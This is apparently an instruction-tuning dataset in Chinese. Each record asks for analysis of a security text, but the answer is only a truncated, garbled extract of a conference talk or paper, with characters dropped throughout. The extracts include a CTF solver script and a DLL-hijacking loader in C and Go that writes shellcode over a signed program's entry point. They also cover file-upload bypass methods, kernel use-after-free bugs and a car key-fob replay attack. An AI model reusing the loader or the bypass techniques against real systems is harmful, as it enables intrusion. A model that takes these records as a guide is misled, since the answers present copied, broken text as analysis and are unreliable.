{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWMCTF 2021 Nu1L Writeup WMCTF 2021 Nu1L Writeup Misc Checkin Questionaire 你画我猜 我画你猜 一笔改画 Foolish Black Ai Entrance LOGO Plants VS Zombies Version1 car hack Crypto checkin easylsb ezl1near PWN red_high_heels dy_maze Nescafe Reverse Re1 Re2 Web ez piwigo Number Misc Checkin checkin Questionaire questionaire 你画我猜 随便画 我画你猜 \\反应速度+手速挑战 可以魔改题目源码提交后自动切换到下一题防止鼠标移动和图片加载浪费时间 一笔改画 游戏实现有bug导致可以更换题目同时因为模型train的比较差随便加一笔暴力直到本地正确发给服 务器就好 function guess(name){ $.post(\"./start\",{stt:name},function(data){start();}); clearInterval(tim); background(255); $(\"#note\").text(\"下一题\"); $(\"#define\").slideToggle(); } import requests import numpy as np from tensorflow import keras sess = requests.session() classes = [\"basketball\", \"umbrella\", \"violin\", \"rainbow\", \"police car\", \"sheep\", \"t-shirt\", \"bicycle\", \"dog\", \"ice cream\" ] def changeformat(stt): b=[] for i in stt.split(';')[:-1]: #print(i) b.append([int(j) for j in i.split(',')]) return b DRAW_SIZE = [250, 250] def parse_line(np_ink): #np_ink=np.array(jsline, dtype=np.float32) # Preprocessing. # 1. Size normalization. 赛后测了下不用换题的bugrandom start+IFGSM也可以做 Foolish Black Ai Entrance 黑盒不定向攻击计算每个像素的梯度做梯度下降注意clip防止无穷范数超过限制 np_ink[:, 0: 2] = np_ink[:, 0: 2] / DRAW_SIZE # 2. Compute deltas. np_ink[1:, 0:2] -= np_ink[0:-1, 0:2] np_ink = np_ink[1:, :] np_ink[:, 0: 2] = -np_ink[:, 0: 2] return np_ink url = \"<http://182.92.232.152:6001/start>\" model = keras.models.load_model('model.h5') def predictt(basePicture,youPrintPicture): pic=parse_line(np.array(basePicture+changeformat(exp),dtype=np.float32)) ret=model.predict(pic.reshape([1,-1,3])) return ret.argmax() first = 1 while 1: chall = sess.get(url).json() try: pic = eval(chall[\"pic\"]) except: print(sess.post(url, data={'stt':'1'}).text) continue scores = chall[\"scores\"] topic = chall[\"topic\"] print(scores, topic) exp = \"427,263,0;427,263,0;427,263,0;427,263,0;427,263,0;427,263,0;427,263,0;427,263,0;4 27,263,1;\" res = classes[predictt(pic, exp)] if res in topic: print(sess.post(url, data={'stt':exp}).text", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGuess Where I am: Android模拟器躲避的检测与应对 胡文君(MindMac) 肖梓航(Claud Xiao) 模拟器检测技术 模拟器技术应用广泛  Google安全企业使用模拟器检测恶意代码  为什么用模拟器而不是真机  经济成本低  高度可定制  易于开发  容易部署 模拟器检测技术现状  Timothy Vidas and Nicolas Christin, Evading Android Runtime Analysis via Sandbox Detection, ASIACCS14  赵闽 and 倪超逃离安卓动态检测&订票助手一日谈HitCon 2013  Tim Strazzere, Dex Education 201:Anti-Emulators, HitCon 2013  Patrick Schulz, Android Emulator Detection by Observing Low-level Caching Behavior  Felix Matenaar and Patrick Schulz, Detecting Android SandBoxes  Jon Oberheide and Charlie Miller, Dissecting the Android Bouncer, SummerCon 2012  Nicholas J. Percoco and Sean Schulter, Adventures in BouncerLand, Black Hat USA 2012  Vaibhav Rastogi, Yan Chen and William Enck, AppsPlayGround: Automatic Security Analysis of Smartphone Applications, CODASPY 13 模拟器检测技术的分类  模拟检测技术从上至下可分为4类 用户层行为和数据 Android系统层特征 Linux系统层特征 模拟器体系结构特征 基于用户层行为和数据检测模拟器  存在API DemosDev Tools等一般模拟器上 的应用程序  联系人短信电话记录相册是否为空  应用程序安装数量很少 or 只有模拟器上默 认的应用程序  logcat一直处于运行状态Log中记录敏感 数据信息如短信发送的目的地址和内容 基于Android系统层特征检测模拟器  电话号码 == 15555215554-5584,etc  电池状态与电量  wifiGPS等硬件特征  Build.Device == generic, etc  反射调用SystemProperties.get获取属性值  读取/system/build.prop文件  Monkey行为模拟事件 基于Linux系统层特征检测模拟器  通过驱动信息特征检测模拟器  通过设备文件特征检测模拟器  通过执行shell命令检测模拟器  通过Native Code检测模拟器 基于模拟器体系结构特征检测模拟器  模拟器CPU信息异于真实机器  DexLabs-Qemu二进制翻译技术  BlueBox-模拟器底层缓存行为 Felix Matenaar and Patrick Schulz 基于模拟器体系结构特征检测模拟器  模拟器CPU信息异于真实机器  adb shell  cat /proc/cpuinfo 反模拟器对抗的应用不理想  使用模拟器的分析系统考虑到了模拟器检测行为的存在  各分析系统针对性地使用了反模拟器检测技术  最新研究结果表明实际效果并不理想  Timothy Vidas and Nicolas Christin, Evading Android Runtime Analysis via Sandbox Detection, ASIACCS14 图片来源Evading Android Runtime Analysis via Sandbox Detection, ASIACCS14 我们的问题  如何判断Android应用程序是否存在反模拟器 行为  真实世界中有多大比例的应用程序会进行 模拟器检测采用何种手段进行检测检测 模拟器的目的  如何构造更真实的模拟器欺骗应用程序其 运行在真机环境 如何判断Android应用程序是否 存在反模拟器行为 反模拟器行为真实案例  通过Build.MODEL获取设备型号  与特定字符串进行比较 获取设备型号 与特定字符串比较 模拟器标识 模拟器检测 反模拟器行为检测思路  反编译APK  搜索特定API以及字符串  若存在获取系统信息并与特定字符串比较 则认为存在模拟器检测行为 反模拟器行为特征(40条特征)  TelephonyManager", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n有幸受我师鸡头的邀请参加鸡友故事会分享些随笔名字就叫四分之 好了我的四分之 从接触安全到现在其实已经很多年了时侯因为家的电脑感染熊猫烧病毒爸 修了很久尽了办法从那个时候就埋下了个种后来拜师花钱买具被骗 我都经历过那是个阿D明就可以吊打站的年代可我却从来没有静下 来研究过原理想想现在觉得蛮遗憾的后来因为上学放弃了很久直到学选择 专业原来的种早就发了芽违背了家的意愿最后天偷偷修改了志愿的 顺序放弃了家安排的些路上了web 的桥我想可能这就是的坚持吧后 来和身边的伙伴聊天原来很多都是怀着最初的那份初才上了安这个圈 或许后来被迫转职或者还在忙于计但永远记住当时的坚持和写过的故 事 记得去年因为些原因裸辞在家个因为些原因开始找份红队的作定点 试了家公司遇到过很多职位诱惑和陷阱结果有通过的有没通过的有合适的也 有不合适的迷茫过犹豫过想过放弃后来还是决定坚持的本做想做的 那个时候给做了个三年职业规划现在也还在每天努着我记得那个很低的时 期给写过篇随笔叫 你还想拿年轻这个词躲多久其中有段送给的 话想送给家 后来慢慢适应了现在的活有项的时候就打打项在项中会遇到很多很多场 景需要解决的问题需要优化的地技战法然后等到不忙的时候就把这些沉淀下 来刷刷章学学师傅们的新思路努充实打过融能源打过部委政企打 过互联医疗也打过很多知道的不知道的业有时候发呆在想我们做的事回家 的时候都不知道怎么跟乡亲邻解释哎就好像我说我是做络安全的他们会问啥 的我说互联IT搞安全他们嘴上说着哦哦IT精英啊可能都在想家电脑下次 再坏了找他修下诸如这类的种种 后来2020年过年的时候因为疫情没有回家有幸参与了某项重保从那个时候就喜 欢上了编的句话你负责在现实的世界阳光明媚我们在你看不的世界之中默默 前就觉得我们也变成了很了不起的在他们不理解的领域阻挡了很的危害守护了 很多样重保那天我记得很清楚2021年211号是我在新公司正式转正的第天 也是在异乡异地的第个新年 那天给写了这样段话也偷偷拍下了很漂亮的烟花送给家 很庆幸上了这条路做技术坚持到了现在不是转了其他岗位感谢师傅的分 享邀请也很感谢在圈遇到了很多很多起努的伙伴起饭挣钱努学技术 很抱歉这次没有分享技术成呀技术章啊下次定补上对了这是我的四分之 讲了个关于我的故事给各位听", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF培训PWN(漏洞挖掘与利用) 报告人: 360政企安服-胡晓梦 时间2019年9月X日 CONTENT 团队介绍和自我介绍 1 PWN介绍 2 PWN基础入门 3 PWN实例讲解与演示 4 PWN解题总结 5 团队介绍和自我介绍 第一部分 团队介绍&自我介绍 待完善优化 讲在前面的话 师傅领进门修行在个人 虽然大部分培训只是入门的引领但这里我们传授的是核心知识体系 PWN介绍 第二部分 CTF-PWN介绍 Ø 什么是PWN PWN 题目主要考察二进制漏洞的挖掘和利用需要对计算机操作系统底层有一 定的了解在 CTF 竞赛中PWN 题目主要出现在 Linux 平台上 Ø PWN题目形式?  一个ip地址和端口号 Example: nc 106.75.2.53 60044 1.nc==>即netcat一个小巧的网络工具Linux中自带本题 中用来建立TCP连接 2.连接成功后目标主机会运行题目文件通过TCP连接进行交互  一个二进制文件 即目标主机会运行的题目文件 换句话说比赛时可以在二进制层面知道目标主机将会运行什么代码没有 源代码 CTF-PWN介绍 Ø PWN题目需要做什么(流程) 1.分析二进制文件找到其中的漏洞 利用IDA Pro(目前工业界最先进的反汇编和反编译利器)等工具进行二进 制分析,结合GDB调试找到其中的漏洞 2.通过异常的输入,绕过防护,利用漏洞执行目标代码 常见的套路是执行system(/bin/sh)打开shell 3.获取flag flag一般在当前文件夹下 cat ./flag 打开flag文件(一般txt格式)获得flag(一串字符) CTF-PWN介绍 Ø PWN入门需要哪些知识 l 汇编语言基础函数调用时的栈帧变换 l 逆向基础: IDA静态分析+GDB动态调试,PWN可以看做是REVERSE的升级版 (REVERSE++) l 软件防护技术(漏洞利用缓解) 栈保护Canary,堆栈不可执行NX(No-eXecute) 地址随机化ASLR(address space layout randomization)/PIE . . . l 各种类型漏洞原理一般针对Linux系统 主要两大类:栈漏洞(溢出), 堆漏洞(更复杂) printf 格式化字符串漏洞 I/O file 漏洞等 l 漏洞利用方法 ROP(Return-Oriented Programming)技巧(还有JOP, Return To Libc, GOT Hook. . .目标劫持控制流) CTF-PWN介绍 Ø PWN需要使用哪些工具 l Linux系统(一般使用Ubuntu,Kali linux也可以 l IDA Pro:反汇编及反编译同时也是强大的调试器(不过Linux环境下调试文件略麻烦) l Pwntools:一个用来解题的Python库内置有很多自动查找地址自动生成shellcode的函一 般情况下不会出现可以直接用pwntools某个函数就能解的题同时攻击的方法多样 pwntools一般只是用到远程连接的功能 l GDB Linux 下 命令行界面的调试器有一些好用的插件比如gdb_pedapwndbg 插件可以在GitHub上找到开源易安装 l ROPgadget用于查找gadget和生成ROP链(之后会再介绍) l . . . . . Ø PWN基本解题流程(基于逻辑灵活解题) 逆向工程 漏洞挖掘 漏洞利用& 防护绕过 GetShell(flag) CTF-PWN介绍 安全保护检查 PWN基础入门 第三部分 PWN基础入门 Ø 汇编基础(参考REVERSE,这里不细述) Ø 栈溢出 Ø Linux漏洞安全防护机制与绕过 Ø 其他漏洞(整数溢出格式化字符串等 Ø 堆漏洞 Ø .. PWN攻防一览图 by jacob 栈溢出(返回地址覆盖) 栈溢出防护 栈防护绕过 返回地址覆盖 NX/DEP Canar y ASLR/PIE Ret2ShellCode Ret2ibc ROP HijackGOT 函数地址劫持 泄露Canary Canary 格式化字符串 劫持__stack_chk_fail 爆破Canary(fork) ssp leak Ret2ibc NX/DEP ASLR/PIE ROP return-to-plt 爆破 GOT overwrite GOT dereference 泄露libc 覆盖GOT 堆溢出(多样有趣) 组合利用 灵活解题 partial write vdso/vsyscall writeprintf PWN基础入门 Ø 汇编基础(参考REVERSE篇,这里不细述) Ø 栈溢出 Ø Linux漏洞安全防护机制与绕过 Ø 其他漏洞(整数溢出格式化字符串等 Ø 堆漏洞 Ø .. PWN基础入", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n用Golang编写 dll劫持的一些坑 (1) 源于知识星球的一个想法利用一些已知的dll劫持的程序作为\"模板\",自动生成白加黑的程序 我想用Golang编写劫持的dll这样也方便可以做成在线平台 当然dll加载模式不同劫持的方式也不同 我找到是vscode它的更新程序也有它官方的签名 看 inno_updater.exe 的导出表我只用实现它的5个函数就可以了 因为我想做成通用型的对于这种输入表导入的dll做劫持只需要在 DllMain 中获取主程序的入口点 然后将shellcode写入入口点之后主程序运行就会执行我们的shellcode了 C代码如下 测试过是能够正常使用的 但是把它转成Go的过程中踩了不少坑 C代码转换为Go 读取PE入口点用来写shellcode用Windows API GetModuleHandle 可以得到PE进程的内存地址根 据内存地址加减偏移就可以得到入口点 我原本使用了 github.com/Binject/debug/pe 库它里面有一个 pe.NewFileFromMemory() 函数可 以直接从内存中读取但是它的参数是需要一个 io 类型文件的io自身有很多api但是对内存的io 资料好少 最后找了很多资料发现只能自己实现io的接口 但问题来了 ReadAt 接口要求我们自己读完了就返回 io.EOF 我是从内存空间读的我不知道什么时 候读完 就这么纠结了好久虽然现在写的时候想到了我可以实现这个 ReadAt 长度我可以生成模板的时候 硬写进去但又感觉没必要因为我根据PE的偏移写好了 int WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, PVOID pvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: hello_func(); break; case DLL_PROCESS_DETACH: break; } return TRUE; } void hello_func() DWORD baseAddress = (DWORD)GetModuleHandleA(NULL); PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew); DWORD entryPoint = (DWORD)baseAddress + ntHeader- >OptionalHeader.AddressOfEntryPoint; DWORD old; VirtualProtect(entryPoint, size, 0x40, &old); for(int i=0;i<size;i++){ *((PBYTE)entryPoint+i) = shellcode[i]; } VirtualProtect(entryPoint, size, old, &old);  type ReaderAt interface { ReadAt(p []byte, off int64) (n int, err error) } 直接就不用它的库了手动根据偏移去寻找入口点 Go实现DllMain DllMain是dll在创建或退出时的消息函数要把shellcode写入PE的入口点就必须在这里执行代码但 是Go里面没有这样相关的定义搜索资料有人说用 init() 函数可以我试了下 init() 函数执行 是在代码运行的时候加载的也就是pe运行了执行到了相关导出函数的时候会先执行 init() 代 码但是这个时候写shellcode到PE头部就已经没用了 最后发现了怎么做就是混编C和Go,而且比较麻烦 var ( kernel32 = syscall.NewLazyDLL(\"kernel32.dll\") getModuleHandle = kernel32.NewProc(\"GetModuleHandleW\") procVirtualProtect = kernel32.NewProc(\"VirtualProtect\") ) func GetModuleHandle() (handle uintptr) { ret, _, _ := getModuleHandle.Call(0) handle = ret return } // 将shellcode写入程序ep func loader_from_ep(shellcode []byte) { baseAddress := Ge", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUpload Upload Upload Upload Attack Attack Attack Attack Framework Framework Framework Framework Version Version Version Version 1.0 1.0 1.0 1.0 CasperKid [Syclover][Insight-Labs] 2011/10/6 [*] Team : Syclover Security Team & Insight Labs [*] Web : www.myclover.org & www.insight-labs.org [*] Blog : hi.baidu.com/hackercasper [*] Mail : casperkid.syclover@gmail.com 前言 这篇 paper 还是断断续续憋了我两个月左右想把整个攻击能抽象出一个体系出来所 以一直拖了很久才最终成型个中艰辛还是在自己能体会原本 paper 是投到 webzine0x06 后来刺总(axis)说 webzine0x06 要 11 月才发布很多朋友又在催就提前公开这篇 paper 了 在现在越来越安全的体系下sql injection 这类漏洞已经很难在安全性较高的站点出现 比如一些不错的.NET 或 JAVA 的框架基本上都是参数化传递用户输入以及其他一些能防御 SQL 注入的 API直接封死注入攻击在非 php 的 web 安全中出现概率很大而且威力也很 大的攻击主要有两种第一种是 sql injection第二种便是上传攻击php 的还有本地/远程 文件包含或代码注入漏洞等) 通常 web 站点会有用户注册功能而当用户登入之后大多数情况下都会存在类似头像 上传附件上传一类的功能这些功能点往往存在上传验证方式不严格的安全缺陷是在 web 渗透中非常关键的突破口只要经过仔细测试分析来绕过上传验证机制往往会造成被 攻击者直接上传 web 后门进而控制整个 web 业务的控制权复杂一点的情况是结合 web server 的解析漏洞来上传后门获取权限 这篇 paper 或许还并不算完善但在分类总结上还是比较全面我看过 OWASP 和 Acunetix 对上传攻击的分类很多方面并不够全面在写 paper 这段时间因为也在学习其他 东西比较忙现在才把这篇 paper 算写了一个相对来说比较完整的版本麻雀虽小五脏 俱全之中有不足之处希望大家有类似经验的提出来以便我能更加完善这篇 paper也 让大家的交流产生更大的价值 还有关于这个 framework当时看有部分朋友有些误解以为有这个 framework就一 定能挖到 exp 之类为了不误导大家在这里还是做个说明我的本意只是为了提供一种 相对来说系统的分析方法比如给你一份 upload 的源码或者一个 website你怎么来系统地 进行白盒/黑盒分析它并从流程中找出它的逻辑漏洞或其他漏洞来而不是去猜它会有什 么漏洞更高层次的渗透不应该是去猜测目标而是通过好的分析和总结能确定甚至预测目 标要自己能心里真正清楚目标的信息是什么版本有什么漏洞一次就成功而不是我 猜下这样是否能成功的侥幸心理渗透不是猜测而是结合社会工程学收集到足够多的信息 明确甚至预测目标的环境然后不做过多的动作而让自己最大化隐藏完成渗透测试 在写 paper 时保存的图像分辨率都比较高大家用 100%分辨率观看时可能不太清晰 需要看图像的细节时推荐大家用 200%-400%分辨率来观看即可 目录概览 目录概览 目录概览 目录概览 0x00 上传检测流程概述 0x01 客户端检测绕过(javascript 检测) 0x02 服务端检测绕过(MIME 类型检测) 0x03 服务端检测绕过(目录路径检测) 0x04 服务端检测绕过(文件扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x05 服务端检测绕过(文件内容检测) - 文件幻数检测 - 文件相关信息检测 - 文件加载检测 0x06 解析攻击 - 网络渗透的本质 - 直接解析 - 本地文件包含解析 - .htaccess 解析 - web 应用程序解析漏洞及其原理 0x07 上传攻击框架 - 轻量级检测绕过攻击 - 路径/扩展名检测绕过攻击 - 文件内容性检测绕过攻击 - 上传攻击框架 - 结语 0x00 上传检测流程概述 通常一个文件以 HTTP 协议进行上传时将以 POST 请求发送至 web 服务器 web 服务器接收到请求后并同意后用户与 web 服务器将建立连接并传输 data 而一般一个文件上传过程中的检测如下图红色标记部分 A 客户端 javascript 检测 (通常为检测文件扩展名) B 服务端 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDance with Apple Core 盘古安全实验室 关于我们  专业的移动安全研究团队  专注物联时代安全  专心与最新的安全技术 Apple内核101  内核 (XNU)是Mach/BSD的混合体  运行的驱动程序在单独分离的一套框架  DriverKit也就是现在的IOKit Apple内核101  BSD  XNU的最上层是POSIX/BSD体系  采用FreeBSD6.0的代码  提供files, processes/pthread, signals等等  Apple扩展: 增加了很多独有的syscalls  Mach  内核中的微内核  NeXTSTEP时代的遗留产物  提供task, thread, memory以及IPC通讯机制的实现  处理底层的异常中断及陷入 Apple内核101  IOKit (DriverKit)  自主的驱动程序环境  移植自NextSTEP时代的DriverKit  采用面向对象并且受限制的C++框架  采用复杂的多层机制IORegistry  采用它自身的IPC子系统(mach)  在内核中parse XML(!!!)  内核中主要的attack surface IOKit 101  自包含的运行环境  IO* API封装着内核态的API  驱动相对容易移植  C++运行库由libkern提供  驱动通过IORegistry注册并且分类  用户态的API由IOKit.framework提供  映射内存至用户态  对Userclient提供方法和属性设置接口 IOKit 101  IOService  自动向IORegistry注册驱动  在驱动生命周期内提供callback  支持notification  支持中断处理  并且提供Userclient机制和用户态API进行通讯 IOKit 101  IOKit User Clients  直接和用户态交互的接口  并非所有驱动都提供User Clients  通过继承IOUserClient实现  调用的方法保存在vtable  IOKit会校验对应方法的参数(类型, size)  Struct / Scalar (二进制数据以及整数或者内存地址) IOKit 漏洞举例  内核中提供XML解析  其中OSUnserializeBinary用于反序列化二进制XML数据  OSUnserializeBinary 通过动态数组的方式来手动管理OSobject的 指针  存在多个漏洞 IOKit 漏洞举例  CVE-2016-1828 use-after-free漏洞  当我们在XML字典中两次设置同一个key的时候 会导致前一个key的对象指针指向的内容被释 放掉  但是OSUnserializeBinary内部动态数组中还保 存了前一个对象的指针  当这个指针被引用的时候导致UAF IOKit 漏洞举例  CVE-2016-4655 / CVE-2016-4680  内核info-leak漏洞  在处理kOSSerializeNumber时二进制内 容中的长度直接传递给 OSNumner::withNumber函数 IOKit 漏洞举例  OSNumber  实际上长度不能大于64字节  但是代码在初始化size的时候并没有对用户输入做验证  会影响调用size getter函数numberOfBits()/numberOfBytes() IOKit 漏洞举例  is_io_registry_entry_get_property_bytes  该函数用于获取指定key的数据  Bytes=&offsetBytes 指向栈上的数据  长度是我们控制的  bcopy调用会导致泄露栈上的数据  函数返回地址/堆地址/cookie IOKit/MIG 漏洞举例  IOSurfaceRootUserClient port UAF (CVE-2017-13861)  UserClient异步调用的时候会释放一个传入的port结构  IOConnectCallAsyncStructMethod(connect, 17, port, &references, 1, input, sizeof(input), NULL, NULL);  17号调用中的releaseAsyncReference64操作从而引发iokit_release_port_send释放传入 的port结构 IOKit/MIG 漏洞举例  IOSurfaceRootUserClient port UAF (CVE-2017-13861)  返回至上层的MIG代码时会继续对这个已经释放过port进行清理操作导致UAF  ipc_kmsg_destroy->ipc_kmsg_cl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents RollBack A New Time-Agnostic Replay Attack Against the Automotive Remote Keyless Entry Systems Joint work with Jun Wen Wong (NCS Group / DSBJ), Soundarya Ramesh (NUS), Rohini Poolat Parameswarath (NUS), Mun Choon Chan (NUS) Levente Csikor NCS Group Institute for Infocomm Research, A*STAR Hoon Wei Lim NCS Group #BHUSA @BlackHatEvents Information Classification: General Keyless car thefts have been on the rise 2/42 #BHUSA @BlackHatEvents Information Classification: General Keyless car thefts have been on the rise  Keyless entry car technology now accounts for nearly 50% of all vehicle thefts UK Daily Mail, Jul 2021  The risk of technology-enabled vehicle theft will continue to increase Auto-ISAC Threat Assessment Report 2021  Keyless entry/key fob is one of top two most common attack vectors Upstream Global Automotive Cybersecurity Report 2022 3/42 #BHUSA @BlackHatEvents Information Classification: General Threats against remote keyless entry systems  Manipulation of key fob signals  Signal jamming  Relay (amplification) attacks  Replay attacks  Attack on key management and cryptographic algorithms  Key enrolment  Key replacement  Key extraction 4/42 #BHUSA @BlackHatEvents Information Classification: General Recent car hacks based on replay of signals 5/42 #BHUSA @BlackHatEvents Information Classification: General Our new findings in a nutshell  New replay attack - RollBack  Revealed highly unusual behavior  more effective than previously known key fob replay attacks  Initial discovery in Aug 2021: unlocked a car by replaying two consecutive signals within 5 seconds  Derived new generic attack metrics in Mar 2022 that work across different car makes & models: no. of signals, sequence, interval, instructions in the signal  Appear consistent with security assessments by Thatcham Research  Consumer Security Ratings 2021  Responsible disclosure  Notified key fob chip manufacturers in Apr 2022  Shared findings with Auto-ISAC in May 2022 Source: Thatcham", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsymmetric Defense Asymmetric Defense How to Fight Off the NSA Red Team with Five People or Less Efstratios L. Gavas Department of Marine Transportation United States Merchant Marine Academy DEFCON 17 Asymmetric Defense Outline Introduction What is the Point? About the USMMA About the CDX Network Design Overview of Network Design Quick Guides Operating Systems Tools Network Application Servers FreeBSD Asymmetric Defense Introduction What is the Point? Who should listen? These are not solutions for everyone  Small shops with smaller budgets  Limited resources  Unreasonable expectations Asymmetric Defense Introduction What is the Point? What I hope you take away  Simplicity is the only way to save yourself  If you dont understand it  it is not secure!  Dont be afraid of your system Asymmetric Defense Introduction About the USMMA What is the USMMA? No, they are not Marines (mostly)  Established to train merchant marine officers  Part of the Department of Transportation  The folks that operate those HUGE ships  Smallest of the five US undergraduate service academies  The one you have not heard of  Things they are NOT:  Navy, Coast Guard, Marines, normal . . .  They may become one of the above (except normal) Asymmetric Defense Introduction About the CDX What is the CDX?  A week-long, annual information security event for students from various military institutions  Air Force Institute of Technology (AFIT)  Naval Postgraduate School (NPS)  Royal Military College of Canada (RMC)  United States Air Force Academy (USAFA)  United States Coast Guard Academy (USCGA)  United States Merchant Marine Academy (USMMA)  United States Military Academy (USMA)  United States Naval Academy (USNA) Asymmetric Defense Introduction About the CDX What is the CDX?  Each team is given a mock budget to secure a poorly configured/compromised network  Email, Instant Messaging, Database and Web Servers, Workstations, and a Domain Controller  Administrate network while under live-attacks from NSA Red T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnboxing Android Everything you wanted to know about Android packers Slava Makkaveev Avi Bashan Who Are We? @Avi Founder at myDRO, former Mobile R&D Team Leader at Check Point, security researcher at Lacoon Mobile Security. Experienced in OS Internal research, mobile security, Linux kernel. @Slava Senior Security Researcher at Check Point, former Security Researcher at Verint. Holds a Phd in Computer Science. Vast experience in mobile reverse engineering and Linux internals and malware analysis. Boxing Apps  Malware authors use various boxing techniques to prevent  Static Code Analysis  Reverse Engineering  This can be done by proprietary techniques or 3rd party software  This Includes  Code Obfuscation  Anti Debugging  Anti Tampering  Anti Dumper  Anti Decompiler  Anti Runtime Injection Maliciousness of Packed Apps Analyzed 13,000 Apps (July 2017) Techniques to protect an apps code  Obfuscators  Packers  Protectors Apk Protection Techniques  Obfuscators  Packers  Protectors Apk Protection Techniques pm.getClass().getMethod(\"getPackageSizeInfo\", String.class, Class.forName(\"android.content.pm.IPackageStatsObserver\")).invoke(pm, packInfo.packageName, new IPackageStatsObserver.Stub() { public void onGetStatsCompleted(PackageStats pStats, boolean succeeded) { } }); v6.getClass().getMethod(\"getPackageSizeInfo\", String.class, Class.forName(\"android.a.a.a\")).invoke(v6, ((PackageInfo)v0_5).packageName, new a() { public void a(PackageStats arg3, boolean arg4) { } });  Obfuscators  Packers  Protectors Apk Protection Techniques Original DEX  Obfuscators  Packers  Protectors Packer Loader Encrypted DEX APK APK Packing process Apk Protection Techniques Packer Loader Encrypted DEX  Obfuscators  Packers  Protectors Packer Loader Original DEX APK APK Execution Apk Protection Techniques  Obfuscators  Packers  Protectors Apk Protection Techniques  Obfuscators  Packers  Protectors Original DEX Encrypted Modified DEX APK APK Protection Process Protector Loader Apk Protection Technique", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/* This file has been generated by the Hex-Rays decompiler. Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com> Detected compiler: GNU C++ */ #include <defs.h> //------------------------------------------------------------------------- // Function declarations __int64 (**init_proc())(void); void sub_4620(); // int printf(const char *format, ...); // __int64 __fastcall __cxa_begin_catch(_QWORD); weak // size_t strlen(const char *s); // int memcmp(const void *s1, const void *s2, size_t n); // __int64 __fastcall __cxa_allocate_exception(_QWORD); weak // __int64 __fastcall __cxa_atexit(_QWORD, _QWORD, _QWORD); weak // _QWORD __cdecl operator new(unsigned __int64); idb // void __noreturn exit(int status); // int scanf(const char *format, ...); // _QWORD std::ios_base::Init::Init(std::ios_base::Init *this); idb // int puts(const char *s); // __int64 __fastcall __cxa_end_catch(_QWORD); weak // void __fastcall __noreturn __cxa_throw(__int64 a1, __int64 a2, __int64 a3); // void _Unwind_Resume(struct _Unwind_Exception *); // __int64 __fastcall _cxa_finalize(_QWORD); weak __int64 (**sub_4750())(void); __int64 sub_4790(); __int64 (**sub_47E0())(void); __int64 sub_4820(); _QWORD *run_funkies(); void __fastcall __noreturn do_goto(int a1); void __noreturn nope(); void __fastcall main(__int64 a1, char **a2, char **a3); __int64 __fastcall sub_579A(int a1, int a2); __int64 sub_57E3(); _QWORD *__fastcall sub_57F8(_QWORD *a1); void sub_5812(); void __noreturn opcode_118(); void __noreturn opcode_87(); void __noreturn opcode_76(); void __noreturn opcode_5(); void __noreturn opcode_19(); void __noreturn opcode_50(); void __noreturn opcode_27(); void __noreturn opcode_103(); void __noreturn opcode_80(); void __noreturn opcode_43(); void __noreturn opcode_113(); void __noreturn opcode_17(); void __noreturn opcode_104(); void __noreturn opcode_122(); void __noreturn opcode_114(); void __noreturn opcode_6(); void __noreturn opcode_123(); void __noreturn opcode_35(); void __noreturn opcode_3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nskill === 向选定的进程发送信号冻结进程 ## 补充说明 **skill命令** 用于向选定的进程发送信号冻结进程这个命令初学者并不常用深入之后牵涉到系统服务优化之后可能会用到 ### 语法 ```shell skill(选项) ``` ### 选项 ```shell -f快速模式 -i交互模式每一步操作都需要确认 -v冗余模式 -w激活模式 -V显示版本号 -t指定开启进程的终端号 -u指定开启进程的用户 -p指定进程的id号 -c指定开启进程的指令名称 ``` ### 实例 如果您发现了一个占用大量CPU和内存的进程但又不想停止它该怎么办考虑下面的top命令输出 ```shell top -c -p 16514 23:00:44 up 12 days, 2:04, 4 users, load average: 0.47, 0.35, 0.31 1 processes: 1 sleeping, 0 running, 0 zombie, 0 stopped CPU states: cpu user nice system irq softirq iowait idle total 0.0% 0.6% 8.7% 2.2% 0.0% 88.3% 0.0% Mem: 1026912k av, 1010476k used, 16436k free, 0k shrd, 52128k buff 766724k actv, 143128k in_d, 14264k in_c Swap: 2041192k av, 83160k used, 1958032k free 799432k cached PID USER PRI NI SIZE RSS SHARE stat %CPU %MEM time CPU command 16514 oracle 19 4 28796 26M 20252 D N 7.0 2.5 0:03 0 oraclePRODB2... ``` 既然您确认进程16514占用了大量内存您就可以使用skill命令冻结它而不是停止它 ```shell skill -STOP 1 ``` 之后检查top输出 ```shell 23:01:11 up 12 days, 2:05, 4 users, load average: 1.20, 0.54, 0.38 1 processes: 0 sleeping, 0 running, 0 zombie, 1 stopped CPU states: cpu user nice system irq softirq iowait idle total 2.3% 0.0% 0.3% 0.0% 0.0% 2.3% 94.8% Mem: 1026912k av, 1008756k used, 18156k free, 0k shrd, 3976k buff 770024k actv, 143496k in_d, 12876k in_c Swap: 2041192k av, 83152k used, 1958040k free 851200k cached PID USER PRI NI 